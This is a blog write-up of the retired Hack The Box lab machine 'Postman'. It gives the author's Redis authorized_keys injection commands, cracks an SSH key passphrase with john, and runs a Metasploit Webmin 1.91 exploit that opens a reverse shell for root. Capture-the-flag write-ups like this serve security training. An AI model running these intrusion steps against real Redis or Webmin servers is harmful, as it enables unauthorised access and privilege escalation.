Ben Busby Projects, writeups, ideas, announcements, other random junk

HTB: Postman (Linux Machine)

Hack The Box - “Postman” - Linux -

Completed: December 7th, 2019

Retired: March 12th, 2020

Foothold / User

Nmap scan of all ports turned up a couple of interesting clues:

  • Redis running on port 6379 (lots of info online about a pertinent vulnerability)
  • Webmin v1.91 (also lots of info online about the vuln there) on port 10000

I wasn’t too familiar with redis, but did enough digging to come up with a way of accessing redis-cli on the server.

ssh-keygen -t rsa

(echo -e "\n\n"; cat /root/.ssh/; echo -e "\n\n") > key.txt

redis-cli -h flushall
cat key.txt | redis-cli -h -x set crackit
redis-cli -h config set dir /var/lib/redis/.ssh/
redis-cli -h config set dbfilename "authorized_keys"
redis-cli -h save

and then:

ssh -i /root/.ssh/id_rsa [email protected]

After a few attempts (there were other people using the machine), I gained access to [email protected]

With the Redis user, I was able to poke around quite a bit. I could look in the “Matt” user folder and saw the “user.txt” flag I needed, but couldn’t access it without his creds. Under /opt/, there was an encrypted rsa key backup named “id_rsa.bak”, which I copied over to my own machine to crack.

From previous experience I was already familiar with ssh2john, which can convert rsa keys to a format that can be passed to john the ripper, so I used it to crack the key backup. Running it and saving the output looked like this:

python matt.key > output.hash

cat output.hash

With this output hash, I could run it through john against the typical rockyou list and get the final password:

[email protected]:~/tools
└──> john --wordlist=/usr/share/wordlists/rockyou.txt output.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (matt.key)
1g 0:00:00:08 DONE (2019-12-06 23:24) 0.1124g/s 1613Kp/s 1613Kc/s 1613KC/sa6_123..*7¡Vamos!
Session completed

Since I was still logged in as the Redis user on another terminal, a simple “su Matt” using the “computer2008” password worked as a pivot. From there I had access to the user flag.


Getting root was very straightforward, since I was already aware of a vulnerability in Webmin 1.91 which involved priv escalation while installing packages. With my user credentials for the Webmin portal (Username: Matt, Password: computer2008) I was able to open a port locally with netcat and run the exploit (I know, I know):

msf5 > use exploit/linux/http/webmin_packageup_rce
set SSL true
set LHOST 10.10.XX.XX
set PASSWORD computer2008

msf5 exploit(linux/http/webmin_packageup_rce) > run
[*] Started reverse TCP handler on 10.10.XX.XX:4444
[+] Session cookie: ffa3708422108ae96701bbfc53621920
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.XX.XX:4444 -> at 2019-12-06 23:31:46 -0700

uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt

Overall the machine was fairly simple and straightforward. I was a little sad to see it get retired, since I think it’s a great machine for anyone at any skill level, with the possibility of self-imposed restrictions available to make it more challenging (i.e. no msf). Hopefully it was replaced with a comparable machine (haven’t checked it out yet).

Questions? Comments? Reach out!
You can find all of my projects and more on my Github or my main website.

Comments will appear after admin approval (prevents spam and abuse)